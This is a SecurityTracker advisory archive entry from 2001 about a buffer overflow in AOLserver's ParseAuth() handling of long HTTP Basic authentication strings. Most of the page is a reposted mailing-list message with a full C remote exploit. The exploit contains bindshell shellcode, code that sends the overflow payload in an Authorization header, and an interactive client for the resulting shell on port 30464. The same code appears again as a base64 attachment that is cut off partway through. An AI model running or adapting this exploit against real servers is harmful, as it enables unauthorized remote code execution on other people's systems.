SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   AOLserver Vendors:   America Online, Inc.
(Exploit Code) Re: AOLserver Can Be Crashed By Remote Users With a Long HTTP Authentication String And May Execute Arbitrary Code
SecurityTracker Alert ID:  1002381
SecurityTracker URL:  http://securitytracker.com/id/1002381
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Sep 10 2001
Impact:   Denial of service via network, Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): 3.0, 3.2
Description:   It is reported that previous versions of AOLserver can be crashed by remote users and may execute arbitrary code [the code execution ability has not been verified] due to improper handling of long authentication data.

A user has provided some demonstration exploit code (see the Source Message) that, in some cases, will apparently execute arbitrary code on the server.

For details of the vulnerability, see the Message History for the original Alert.

Impact:   A remote user can cause the server to crash. It has not been confirmed whether this flaw will allow a remote user to cause arbitrary code to be executed.
Solution:   It is reported that AOLserver 3.3.1 and 3.4 are not vulnerable.
Vendor URL:  www.aolserver.com/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry is a follow-up to the message listed below.
Aug 27 2001 AOLserver Can Be Crashed By Remote Users With a Long HTTP Authentication String And May Execute Arbitrary Code



 Source Message Contents

Subject:  AOLserver exploit code


--8323328-1986516652-999797980=:868
Content-Type: TEXT/PLAIN; charset=US-ASCII


hi

AOLserver exploit code attached, read the code for further info.

bye

-- 
/* qitest1 - http://www.digit-labs.org/qitest1 *
 *    ``Ut tensio, sic vis. 69 tecum sis.''    *
 * main(){if(unsatisfied == 69) try_come(in);} */


/*
 * AOLserver version 3.2 and prior Linux x86 remote exploit
 * by qitest1 - Wed Sep 5 17:20:10 CEST 2001 
 *
 * Proof of concept code for exploiting the bof in ParseAuth(). I
 * used this vuln as a playground for some tests, all done on a RH6.2
 * box. The fp will be overwritten by a pointer to a fake frame, with 
 * an fp and an eip pointing to the shellcode. Very unstable, segfault 
 * in most cases. 
 *
 * Greets:	grazer and the other hot guys on #!digit-labs 
 *		teleh0r: come back home fratello! =)
 *
 * ..harder times for 0x69, now at http://digit-labs.org/qitest1..
 */

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netdb.h>

#define	EIP_POS	260
#define SC_ADDR	0xbf1ff9a8
#define FP	0xbf1ff9a0		
#define FAKE_FP 0xbf1ffaf4

  char shellcode[] = /* Taeho Oh bindshell code at port 30464 */
  "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
  "\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
  "\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
  "\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
  "\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
  "\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
  "\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
  "\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
  "\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
  "\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
  "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
  "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";

  int		sockami(char *host, int port);
  void  	shellami(int sock);  
  void		zbuffami(u_long fp, u_long sc_addr, char *zbuf);	
  int		Ns_HtuuEncode(unsigned char *bufin, 
			      unsigned int nbytes, 
			      char * bufcoded);

int
main(int argc, char **argv)
{
  int	sock;
  char	zbuf[1024], ubuf[1024], sbuf[1024];

  printf("\n  AOLserver version 3.3 and prior exploit by qitest1\n\n");

  if(argc == 1)
	{
	  fprintf(stderr, "Usage: %s <target>\n", argv[0]);
	  exit(1);
	}

  printf("+Connecting to %s...\n", argv[1]);
  sock = sockami(argv[1], 80);
  printf("  connected\n");

  printf("+Building buffer with shellcode len: %d...\n", 
  strlen(shellcode)); 
  memset(zbuf, 0x00, sizeof(zbuf));
  zbuffami(FP, SC_ADDR, zbuf);  
  printf("  done\n");

  printf("+Encoding buffer...\n");
  memset(ubuf, 0x00, sizeof(ubuf));
  Ns_HtuuEncode(zbuf, strlen(zbuf), ubuf);
  printf("  done\n");

  printf("+Making http request...\n");
  sprintf(sbuf, 
  "GET / HTTP/1.0\nAuthorization: Basic %s\r\n\r\n", ubuf);
  send(sock, sbuf, strlen(sbuf), 0);
  printf("  done\n");

  printf("+Waiting for the shellcode to be executed...\n  0x69\n");
  sleep(2);
  sock = sockami(argv[1], 30464);
  shellami(sock);
}

int
sockami(char *host, int port)
{
  struct sockaddr_in    address;
  struct hostent        *hp;
  int                   sock;

  sock = socket(AF_INET, SOCK_STREAM, 0);
  if(sock == -1)
        {
          perror("socket()");
          exit(-1);
        }
 
  hp = gethostbyname(host);
  if(hp == NULL)
        {
          perror("gethostbyname()");
          exit(-1);
        }

  memset(&address, 0, sizeof(address));
  memcpy((char *) &address.sin_addr, hp->h_addr, hp->h_length);
  address.sin_family = AF_INET;
  address.sin_port = htons(port);

  if(connect(sock, (struct sockaddr *) &address, sizeof(address)) == -1)
        {
          perror("connect()");
          exit(-1);
        }

  return(sock);
}

void
shellami(int sock)
{
  int             n;
  char            recvbuf[1024], *cmd = "id; uname -a\n";
  fd_set          rset;

  send(sock, cmd, strlen(cmd), 0);

  while (1)
    {
      FD_ZERO(&rset);
      FD_SET(sock, &rset);
      FD_SET(STDIN_FILENO, &rset);
      select(sock+1, &rset, NULL, NULL, NULL);
      if(FD_ISSET(sock, &rset))
        {
          n = read(sock, recvbuf, 1024);
          if (n <= 0)
            {
              printf("Connection closed by foreign host.\n");
              exit(0);
            }
          recvbuf[n] = 0;
          printf("%s", recvbuf);
        }
      if (FD_ISSET(STDIN_FILENO, &rset))
        {
          n = read(STDIN_FILENO, recvbuf, 1024);
          if (n > 0)
            {
              recvbuf[n] = 0;
              write(sock, recvbuf, n);
            }
        }
    }
  return;
}

void
zbuffami(u_long fp, u_long sc_addr, char *zbuf)
{
  int   i, n = 0; 

  for(i = 0; i < EIP_POS; i++)
	zbuf[i] = 0x90; 

  /* Fake frame...
   */
  zbuf[0] = (u_char) (FAKE_FP & 0x000000ff);
  zbuf[1] = (u_char)((FAKE_FP & 0x0000ff00) >> 8); 
  zbuf[2] = (u_char)((FAKE_FP & 0x00ff0000) >> 16);
  zbuf[3] = (u_char)((FAKE_FP & 0xff000000) >> 24);

  zbuf[4] = (u_char) (sc_addr & 0x000000ff);
  zbuf[5] = (u_char)((sc_addr & 0x0000ff00) >> 8);
  zbuf[6] = (u_char)((sc_addr & 0x00ff0000) >> 16);
  zbuf[7] = (u_char)((sc_addr & 0xff000000) >> 24);
	
  for(i = EIP_POS - 4 - strlen(shellcode) - 8; i < EIP_POS - 4 - 8; i++)
        zbuf[i] = shellcode[n++];

  /* Padding...
   */	
  for(n = 0; n < 8 ; n++)
        zbuf[i++] = 0x69;
	
  zbuf[EIP_POS - 4] = (u_char) (fp & 0x000000ff);
  zbuf[EIP_POS - 3] = (u_char)((fp & 0x0000ff00) >> 8);
  zbuf[EIP_POS - 2] = (u_char)((fp & 0x00ff0000) >> 16);
  zbuf[EIP_POS - 1] = (u_char)((fp & 0xff000000) >> 24);

  zbuf[EIP_POS] = 0x00;

  /* Extra junk
   */
  for(i = 0; i < 4; i++)
	strcat(zbuf, "\x69\x69\x69\x69");

  return;
}

  static char    six2pr[64] = 
	{
    'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
    'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z',
    'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
    'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
    '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', '/'
	};

  static unsigned char pr2six[256];

  /* qitest1 and the pleasure of reading... ;pP
   * This routine converts a buffer of bytes to/from RFC 1113
   * printable encoding format.
   * This technique is similar to the familiar Unix uuencode format
   * in that it maps 6 binary bits to one ASCII character (or more
   * aptly, 3 binary bytes to 4 ASCII characters).  However, RFC 1113 
   * does not use the same mapping to printable characters as uuencode. 
   * 
   * Mark Riordan   12 August 1990 and 17 Feb 1991.
   * This code is hereby placed in the public domain. 
   *
   * Encode a single line of binary data to a standard format that
   * uses only printing ASCII characters (but takes up 33% more bytes).
   */
int
Ns_HtuuEncode(unsigned char *bufin, unsigned int nbytes, char * bufcoded)
{

#define ENC(c) six2pr[c]

    register char  *outptr = bufcoded;
    unsigned int    i;

    for (i = 0; i < nbytes; i += 3) {
                /* c1 */
        *(outptr++) = ENC(*bufin >> 2);
                /* c2 */
        *(outptr++) = ENC(((*bufin << 4) & 060) | ((bufin[1] >> 4) & 017));
                /* c3 */
        *(outptr++) = ENC(((bufin[1] << 2) & 074) | ((bufin[2] >> 6) & 03));
                /* c4 */
        *(outptr++) = ENC(bufin[2] & 077);      

        bufin += 3;
    }

    /*
     * If nbytes was not a multiple of 3, then we have encoded too many
     * characters.  Adjust appropriately.
     */
    if (i == nbytes + 1) {
        /* There were only 2 bytes in that last group */
        outptr[-1] = '=';
    } else if (i == nbytes + 2) {
        /* There was only 1 byte in that last group */
        outptr[-1] = '=';
        outptr[-2] = '=';
    }
    *outptr = '\0';
    return (outptr - bufcoded);
}








--8323328-1986516652-999797980=:868
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="aolsrv.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.21.0109061939400.868@localhost.localdomain>
Content-Description: 
Content-Disposition: attachment; filename="aolsrv.c"

LyoNCiAqIEFPTHNlcnZlciB2ZXJzaW9uIDMuMiBhbmQgcHJpb3IgTGludXgg
eDg2IHJlbW90ZSBleHBsb2l0DQogKiBieSBxaXRlc3QxIC0gV2VkIFNlcCA1
IDE3OjIwOjEwIENFU1QgMjAwMSANCiAqDQogKiBQcm9vZiBvZiBjb25jZXB0
IGNvZGUgZm9yIGV4cGxvaXRpbmcgdGhlIGJvZiBpbiBQYXJzZUF1dGgoKS4g
SQ0KICogdXNlZCB0aGlzIHZ1bG4gYXMgYSBwbGF5Z3JvdW5kIGZvciBzb21l
IHRlc3RzLCBhbGwgZG9uZSBvbiBhIFJINi4yDQogKiBib3guIFRoZSBmcCB3
aWxsIGJlIG92ZXJ3cml0dGVuIGJ5IGEgcG9pbnRlciB0byBhIGZha2UgZnJh
bWUsIHdpdGggDQogKiBhbiBmcCBhbmQgYW4gZWlwIHBvaW50aW5nIHRvIHRo
ZSBzaGVsbGNvZGUuIFZlcnkgdW5zdGFibGUsIHNlZ2ZhdWx0IA0KICogaW4g
bW9zdCBjYXNlcy4gDQogKg0KICogR3JlZXRzOglncmF6ZXIgYW5kIHRoZSBv
dGhlciBob3QgZ3V5cyBvbiAjIWRpZ2l0LWxhYnMgDQogKgkJdGVsZWgwcjog
Y29tZSBiYWNrIGhvbWUgZnJhdGVsbG8hID0pDQogKg0KICogLi5oYXJkZXIg
dGltZXMgZm9yIDB4NjksIG5vdyBhdCBodHRwOi8vZGlnaXQtbGFicy5vcmcv
cWl0ZXN0MS4uDQogKi8NCg0KI2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVk
ZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8
bmV0aW5ldC9pbi5oPg0KI2luY2x1ZGUgPG5ldGRiLmg+DQoNCiNkZWZpbmUJ
RUlQX1BPUwkyNjANCiNkZWZpbmUgU0NfQUREUgkweGJmMWZmOWE4DQojZGVm
aW5lIEZQCTB4YmYxZmY5YTAJCQ0KI2RlZmluZSBGQUtFX0ZQIDB4YmYxZmZh
ZjQNCg0KICBjaGFyIHNoZWxsY29kZVtdID0gLyogVGFlaG8gT2ggYmluZHNo
ZWxsIGNvZGUgYXQgcG9ydCAzMDQ2NCAqLw0KICAiXHgzMVx4YzBceGIwXHgw
Mlx4Y2RceDgwXHg4NVx4YzBceDc1XHg0M1x4ZWJceDQzXHg1ZVx4MzFceGMw
Ig0KICAiXHgzMVx4ZGJceDg5XHhmMVx4YjBceDAyXHg4OVx4MDZceGIwXHgw
MVx4ODlceDQ2XHgwNFx4YjBceDA2Ig0KICAiXHg4OVx4NDZceDA4XHhiMFx4
NjZceGIzXHgwMVx4Y2RceDgwXHg4OVx4MDZceGIwXHgwMlx4NjZceDg5Ig0K
ICAiXHg0Nlx4MGNceGIwXHg3N1x4NjZceDg5XHg0Nlx4MGVceDhkXHg0Nlx4
MGNceDg5XHg0Nlx4MDRceDMxIg0KICAiXHhjMFx4ODlceDQ2XHgxMFx4YjBc
eDEwXHg4OVx4NDZceDA4XHhiMFx4NjZceGIzXHgwMlx4Y2RceDgwIg0KICAi
XHhlYlx4MDRceGViXHg1NVx4ZWJceDViXHhiMFx4MDFceDg5XHg0Nlx4MDRc
eGIwXHg2Nlx4YjNceDA0Ig0KICAiXHhjZFx4ODBceDMxXHhjMFx4ODlceDQ2
XHgwNFx4ODlceDQ2XHgwOFx4YjBceDY2XHhiM1x4MDVceGNkIg0KICAiXHg4
MFx4ODhceGMzXHhiMFx4M2ZceDMxXHhjOVx4Y2RceDgwXHhiMFx4M2ZceGIx
XHgwMVx4Y2RceDgwIg0KICAiXHhiMFx4M2ZceGIxXHgwMlx4Y2RceDgwXHhi
OFx4MmZceDYyXHg2OVx4NmVceDg5XHgwNlx4YjhceDJmIg0KICAiXHg3M1x4
NjhceDJmXHg4OVx4NDZceDA0XHgzMVx4YzBceDg4XHg0Nlx4MDdceDg5XHg3
Nlx4MDhceDg5Ig0KICAiXHg0Nlx4MGNceGIwXHgwYlx4ODlceGYzXHg4ZFx4
NGVceDA4XHg4ZFx4NTZceDBjXHhjZFx4ODBceDMxIg0KICAiXHhjMFx4YjBc
eDAxXHgzMVx4ZGJceGNkXHg4MFx4ZThceDViXHhmZlx4ZmZceGZmIjsNCg0K
ICBpbnQJCXNvY2thbWkoY2hhciAqaG9zdCwgaW50IHBvcnQpOw0KICB2b2lk
ICAJc2hlbGxhbWkoaW50IHNvY2spOyAgDQogIHZvaWQJCXpidWZmYW1pKHVf
bG9uZyBmcCwgdV9sb25nIHNjX2FkZHIsIGNoYXIgKnpidWYpOwkNCiAgaW50
CQlOc19IdHV1RW5jb2RlKHVuc2lnbmVkIGNoYXIgKmJ1ZmluLCANCgkJCSAg
ICAgIHVuc2lnbmVkIGludCBuYnl0ZXMsIA0KCQkJICAgICAgY2hhciAqIGJ1
ZmNvZGVkKTsNCg0KaW50DQptYWluKGludCBhcmdjLCBjaGFyICoqYXJndikN
CnsNCiAgaW50CXNvY2s7DQogIGNoYXIJemJ1ZlsxMDI0XSwgdWJ1ZlsxMDI0
XSwgc2J1ZlsxMDI0XTsNCg0KICBwcmludGYoIlxuICBBT0xzZXJ2ZXIgdmVy
c2lvbiAzLjMgYW5kIHByaW9yIGV4cGxvaXQgYnkgcWl0ZXN0MVxuXG4iKTsN
Cg0KICBpZihhcmdjID09IDEpDQoJew0KCSAgZnByaW50ZihzdGRlcnIsICJV
c2FnZTogJXMgPHRhcmdldD5cbiIsIGFyZ3ZbMF0pOw0KCSAgZXhpdCgxKTsN
Cgl9DQoNCiAgcHJpbnRmKCIrQ29ubmVjdGluZyB0byAlcy4uLlxuIiwgYXJn
dlsxXSk7DQogIHNvY2sgPSBzb2NrYW1pKGFyZ3ZbMV0sIDgwKTsNCiAgcHJp
bnRmKCIgIGNvbm5lY3RlZFxuIik7DQoNCiAgcHJpbnRmKCIrQnVpbGRpbmcg
YnVmZmVyIHdpdGggc2hlbGxjb2RlIGxlbjogJWQuLi5cbiIsIA0KICBzdHJs
ZW4oc2hlbGxjb2RlKSk7IA0KICBtZW1zZXQoemJ1ZiwgMHgwMCwgc2l6ZW9m
KHpidWYpKTsNCiAgemJ1ZmZhbWkoRlAsIFNDX0FERFIsIHpidWYpOyAgDQog
IHByaW50ZigiICBkb25lXG4iKTsNCg0KICBwcmludGYoIitFbmNvZGluZyBi
dWZmZXIuLi5cbiIpOw0KICBtZW1zZXQodWJ1ZiwgMHgwMCwgc2l6ZW9mKHVi
dWYpKTsNCiAgTnNfSHR1dUVuY29kZSh6YnVmLCBzdHJsZW4oemJ1ZiksIHVi
dWYpOw0KICBwcmludGYoIiAgZG9uZVxuIik7DQoNCiAgcHJpbnRmKCIrTWFr
aW5nIGh0dHAgcmVxdWVzdC4uLlxuIik7DQogIHNwcmludGYoc2J1ZiwgDQog
ICJHRVQgLyBIVFRQLzEuMFxuQXV0aG9yaXphdGlvbjogQmFzaWMgJXNcclxu
XHJcbiIsIHVidWYpOw0KICBzZW5kKHNvY2ssIHNidWYsIHN0cmxlbihzYnVm
KSwgMCk7DQogIHByaW50ZigiICBkb25lXG4iKTsNCg0KICBwcmludGYoIitX
YWl0aW5nIGZvciB0aGUgc2hlbGxjb2RlIHRvIGJlIGV4ZWN1dGVkLi4uXG4g
IDB4NjlcbiIpOw0KICBzbGVlcCgyKTsNCiAgc29jayA9IHNvY2thbWkoYXJn
dlsxXSwgMzA0NjQpOw0KICBzaGVsbGFtaShzb2NrKTsNCn0NCg0KaW50DQpz
b2NrYW1pKGNoYXIgKmhvc3QsIGludCBwb3J0KQ0Kew0KICBzdHJ1Y3Qgc29j
a2FkZHJfaW4gICAgYWRkcmVzczsNCiAgc3RydWN0IGhvc3RlbnQgICAgICAg
ICpocDsNCiAgaW50ICAgICAgICAgICAgICAgICAgIHNvY2s7DQoNCiAgc29j
ayA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgMCk7DQogIGlmKHNv
Y2sgPT0gLTEpDQogICAgICAgIHsNCiAgICAgICAgICBwZXJyb3IoInNvY2tl
dCgpIik7DQogICAgICAgICAgZXhpdCgtMSk7DQogICAgICAgIH0NCiANCiAg
aHAgPSBnZXRob3N0YnluYW1lKGhvc3QpOw0KICBpZihocCA9PSBOVUxMKQ0K
ICAgICAgICB7DQogICAgICAgICAgcGVycm9yKCJnZXRob3N0YnluYW1lKCki
KTsNCiAgICAgICAgICBleGl0KC0xKTsNCiAgICAgICAgfQ0KDQogIG1lbXNl
dCgmYWRkcmVzcywgMCwgc2l6ZW9mKGFkZHJlc3MpKTsNCiAgbWVtY3B5KChj
aGFyICopICZhZGRyZXNzLnNpbl9hZGRyLCBocC0+aF9hZGRyLCBocC0+aF9s
ZW5ndGgpOw0KICBhZGRyZXNzLnNpbl9mYW1pbHkgPSBBRl9JTkVUOw0KICBh
ZGRyZXNzLnNpbl9wb3J0ID0gaHRvbnMocG9ydCk7DQoNCiAgaWYoY29ubmVj
dChzb2NrLCAoc3RydWN0IHNvY2thZGRyICopICZhZGRyZXNzLCBzaXplb2Yo
YWRkcmVzcykpID09IC0xKQ0KICAgICAgICB7DQogICAgICAgICAgcGVycm9y
KCJjb25uZWN0KCkiKTsNCiAgICAgICAgICBleGl0KC0xKTsNCiAgICAgICAg
fQ0KDQogIHJldHVybihzb2NrKTsNCn0NCg0Kdm9pZA0Kc2hlbGxhbWkoaW50
IHNvY2spDQp7DQogIGludCAgICAgICAgICAgICBuOw0KICBjaGFyICAgICAg
ICAgICAgcmVjdmJ1ZlsxMDI0XSwgKmNtZCA9ICJpZDsgdW5hbWUgLWFcbiI7
DQogIGZkX3NldCAgICAgICAgICByc2V0Ow0KDQogIHNlbmQoc29jaywgY21k
LCBzdHJsZW4oY21kKSwgMCk7DQoNCiAgd2hpbGUgKDEpDQogICAgew0KICAg
ICAgRkRfWkVSTygmcnNldCk7DQogICAgICBGRF9TRVQoc29jaywgJnJzZXQp
Ow0KICAgICAgRkRfU0VUKFNURElOX0ZJTEVOTywgJnJzZXQpOw0KICAgICAg
c2VsZWN0KHNvY2srMSwgJnJzZXQsIE5VTEwsIE5VTEwsIE5VTEwpOw0KICAg
ICAgaWYoRkRfSVNTRVQoc29jaywgJnJzZXQpKQ0KICAgICAgICB7DQogICAg
ICAgICAgbiA9IHJlYWQoc29jaywgcmVjdmJ1ZiwgMTAyNCk7DQogICAgICAg
ICAgaWYgKG4gPD0gMCkNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAg
cHJpbnRmKCJDb25uZWN0aW9uIGNsb3NlZCBieSBmb3JlaWduIGhvc3QuXG4i
KTsNCiAgICAgICAgICAgICAgZXhpdCgwKTsNCiAgICAgICAgICAgIH0NCiAg
ICAgICAgICByZWN2YnVmW25dID0gMDsNCiAgICAgICAgICBwcmludGYoIiVz
IiwgcmVjdmJ1Zik7DQogICAgICAgIH0NCiAgICAgIGlmIChGRF9JU1NFVChT
VERJTl9GSUxFTk8sICZyc2V0KSkNCiAgICAgICAgew0KICAgICAgICAgIG4g
PSByZWFkKFNURElOX0ZJTEVOTywgcmVjdmJ1ZiwgMTAyNCk7DQogICAgICAg
ICAgaWYgKG4gPiAwKQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICBy
ZWN2YnVmW25dID0gMDsNCiAgICAgICAgICAgICAgd3JpdGUoc29jaywgcmVj
dmJ1Ziwgbik7DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICB9DQog
IHJldHVybjsNCn0NCg0Kdm9pZA0KemJ1ZmZhbWkodV9sb25nIGZwLCB1X2xv
bmcgc2NfYWRkciwgY2hhciAqemJ1ZikNCnsNCiAgaW50ICAgaSwgbiA9IDA7
IA0KDQogIGZvcihpID0gMDsgaSA8IEVJUF9QT1M7IGkrKykNCgl6YnVmW2ld
ID0gMHg5MDsgDQoNCiAgLyogRmFrZSBmcmFtZS4uLg0KICAgKi8NCiAgemJ1
ZlswXSA9ICh1X2NoYXIpIChGQUtFX0ZQICYgMHgwMDAwMDBmZik7DQogIHpi
dWZbMV0gPSAodV9jaGFyKSgoRkFLRV9GUCAmIDB4MDAwMGZmMDApID4+IDgp
OyANCiAgemJ1ZlsyXSA9ICh1X2NoYXIpKChGQUtFX0ZQICYgMHgwMGZmMDAw
MCkgPj4gMTYpOw0KICB6YnVmWzNdID0gKHVfY2hhcikoKEZBS0VfRlAgJiAw
eGZmMDAwMDAwKSA+PiAyNCk7DQoNCiAgemJ1Zls0XSA9ICh1X2NoYXIpIChz
Y19hZGRyICYgMHgwMDAwMDBmZik7DQogIHpidWZbNV0gPSAodV9jaGFyKSgo
c2NfYWRkciAmIDB4MDAwMGZmMDApID4+IDgpOw0KICB6YnVmWzZdID0gKHVf
Y2hhcikoKHNjX2FkZHIgJiAweDAwZmYwMDAwKSA+PiAxNik7DQogIHpidWZb
N10gPSAodV9jaGFyKSgoc2NfYWRkciAmIDB4ZmYwMDAwMDApID4+IDI0KTsN
CgkNCiAgZm9yKGkgPSBFSVBfUE9TIC0gNCAtIHN0cmxlbihzaGVsbGNvZGUp
IC0gODsgaSA8IEVJUF9QT1MgLSA0IC0gODsgaSsrKQ0KICAgICAgICB6YnVm
W2ldID0gc2hlbGxjb2RlW24rK107DQoNCiAgLyogUGFkZGluZy4uLg0KICAg
Ki8JDQogIGZvcihuID0gMDsgbiA8IDggOyBuKyspDQogICAgICAgIHpidWZb
aSsrXSA9IDB4Njk7DQoJDQogIHpidWZbRUlQX1BPUyAtIDRdID0gKHVfY2hh
cikgKGZwICYgMHgwMDAwMDBmZik7DQogIHpidWZbRUlQX1BPUyAtIDNdID0g
KHVfY2hhcikoKGZwICYgMHgwMDAwZmYwMCkgPj4gOCk7DQogIHpidWZbRUlQ
X1BPUyAtIDJdID0gKHVfY2hhcikoKGZwICYgMHgwMGZmMDAwMCkgPj4gMTYp
Ow0KICB6YnVmW0VJUF9QT1MgLSAxXSA9ICh1X2NoYXIpKChmcCAmIDB4ZmYw
MDAwMDApID4+IDI0KTsNCg0KICB6YnVmW0VJUF9QT1NdID0gMHgwMDsNCg0K
ICAvKiBFeHRyYSBqdW5rDQogICAqLw0KICBmb3IoaSA9IDA7IGkgPCA0OyBp
KyspDQoJc3RyY2F0KHpidWYsICJceDY5XHg2OVx4NjlceDY5Iik7DQoNCiAg
cmV0dXJuOw0KfQ0KDQogIHN0YXRpYyBjaGFyICAgIHNpeDJwcls2NF0gPSAN
Cgl7DQogICAgJ0EnLCAnQicsICdDJywgJ0QnLCAnRScsICdGJywgJ0cnLCAn
SCcsICdJJywgJ0onLCAnSycsICdMJywgJ00nLA0KICAgICdOJywgJ08nLCAn
UCcsICdRJywgJ1InLCAnUycsICdUJywgJ1UnLCAnVicsICdXJywgJ1gnLCAn
WScsICdaJywNCiAgICAnYScsICdiJywgJ2MnLCAnZCcsICdlJywgJ2YnLCAn
ZycsICdoJywgJ2knLCAnaicsICdrJywgJ2wnLCAnbScsDQogICAgJ24nLCAn
bycsICdwJywgJ3EnLCAncicsICdzJywgJ3QnLCAndScsICd2JywgJ3cnLCAn
eCcsICd5JywgJ3onLA0KICAgICcwJywgJzEnLCAnMicsICczJywgJzQnLCAn
NScsICc2JywgJzcnLCAnOCcsICc5JywgJysnLCAnLycNCgl9Ow0KDQogIHN0
YXRpYyB1bnNpZ25lZCBjaGFyIHByMnNpeFsyNTZdOw0KDQogIC8qIHFpdGVz
dDEgYW5kIHRoZSBwbGVhc3VyZSBvZiByZWFkaW5nLi4uIDtwUA0KICAgKiBU
aGlzIHJvdXRpbmUgY29udmVydHMgYSBidWZmZXIgb2YgYnl0ZXMgdG8vZnJv
bSBSRkMgMTExMw0KICAgKiBwcmludGFibGUgZW5jb2RpbmcgZm9ybWF0Lg0K
ICAgKiBUaGlzIHRlY2huaXF1ZSBpcyBzaW1pbGFyIHRvIHRoZSBmYW1pbGlh
ciBVbml4IHV1ZW5jb2RlIGZvcm1hdA0KICAgKiBpbiB0aGF0IGl0IG1hcHMg
NiBiaW5hcnkgYml0cyB0byBvbmUgQVNDSUkgY2hhcmFjdGVyIChvciBtb3Jl
DQogICAqIGFwdGx5LCAzIGJpbmFyeSBieXRlcyB0byA0IEFTQ0lJIGNoYXJh
Y3RlcnMpLiAgSG93ZXZlciwgUkZDIDExMTMgDQogICAqIGRvZXMgbm90IHVz
ZSB0aGUgc2FtZSBtYXBwaW5nIHRvIHByaW50YWJsZSBjaGFyYWN0ZXJzIGFz
IHV1ZW5jb2RlLiANCiAgICogDQogICAqIE1hcmsgUmlvcmRhbiAgIDEyIEF1
Z3VzdCAxOTkwIGFuZCAxNyBGZWIgMTk5MS4NCiAgICogVGhpcyBjb2RlIGlz
IGhlcmVieSBwbGFjZWQgaW4gdGhlIHB1YmxpYyBkb21haW4uIA0KICAgKg0K
ICAgKiBFbmNvZGUgYSBzaW5nbGUgbGluZSBvZiBiaW5hcnkgZGF0YSB0byBh
IHN0YW5kYXJkIGZvcm1hdCB0aGF0DQogICAqIHVzZXMgb25seSBwcmludGlu
ZyBBU0NJSSBjaGFyYWN0ZXJzIChidXQgdGFrZXMgdXAgMzMlIG1vcmUgYnl0
ZXMpLg0KICAgKi8NCmludA0KTnNfSHR1dUVuY29kZSh1bnNpZ25lZCBjaGFy
ICpidWZpbiwgdW5zaWduZWQgaW50IG5ieXRlcywgY2hhciAqIGJ1ZmNvZGVk
KQ0Kew0KDQojZGVmaW5lIEVOQyhjKSBzaXgycHJbY10NCg0KICAgIHJlZ2lz
dGVyIGNoYXIgICpvdXRwdHIgPSBidWZjb2RlZDsNCiAgICB1bnNpZ25lZCBp
bnQgICAgaTsNCg0KICAgIGZvciAoaSA9IDA7IGkgPCBuYnl0ZXM7IGkgKz0g
Mykgew0KICAgICAgICAgICAgICAgIC8qIGMxICovDQogICAgICAgICoob3V0
cHRyKyspID0gRU5DKCpidWZpbiA+PiAyKTsNCiAgICAgICAgICAgICAgICAv
KiBjMiAqLw0KICAgICAgICAqKG91dHB0cisrKSA9IEVOQygoKCpidWZpbiA8
PCA0KSAmIDA2MCkgfCAoKGJ1ZmluWzFdID4+IDQpICYgMDE3KSk7DQogICAg
ICAgICAgICAgICAgLyogYzMgKi8NCiAgICAgICAgKihvdXRwdHIrKykgPSBF
TkMoKChidWZpblsxXSA8PCAyKSAmIDA3NCkgfCAoKGJ1ZmluWzJdID4+IDYp
ICYgMDMpKTsNCiAgICAgICAgICAgICAgICAvKiBjNCAqLw0KICAgICAgICAq
KG91dHB0cisrKSA9IEVOQyhidWZpblsyXSAmIDA3Nyk7ICAgICAgDQoNCiAg
ICAgICAgYnVmaW4gKz0gMzsNCiAgICB9DQoNCiAgICAvKg0KICAgICAqIElm
IG5ieXRlcyB3YXMgbm90IGEgbXVsdGlwbGUgb2YgMywgdGhlbiB3ZSBoYXZl
IGVuY29kZWQgdG9vIG1hbnkNCiAgICAgKiBjaGFyYWN0ZXJzLiAgQWRqdXN0
IGFwcHJvcHJpYXRlbHkuDQogICAgICovDQogICAgaWYgKGkgPT0gbmJ5dGVz
ICsgMSkgew0KICAgICAgICAvKiBUaGVyZSB3ZXJlIG9ubHkgMiBieXRlcyBp
biB0aGF0IGxhc3QgZ3JvdXAgKi8NCiAgICAgICAgb3V0cHRyWy0xXSA9ICc9
JzsNCiAgICB9IGVsc2UgaWYgKGkgPT0gbmJ5dGVzICsgMikgew0KICAgICAg
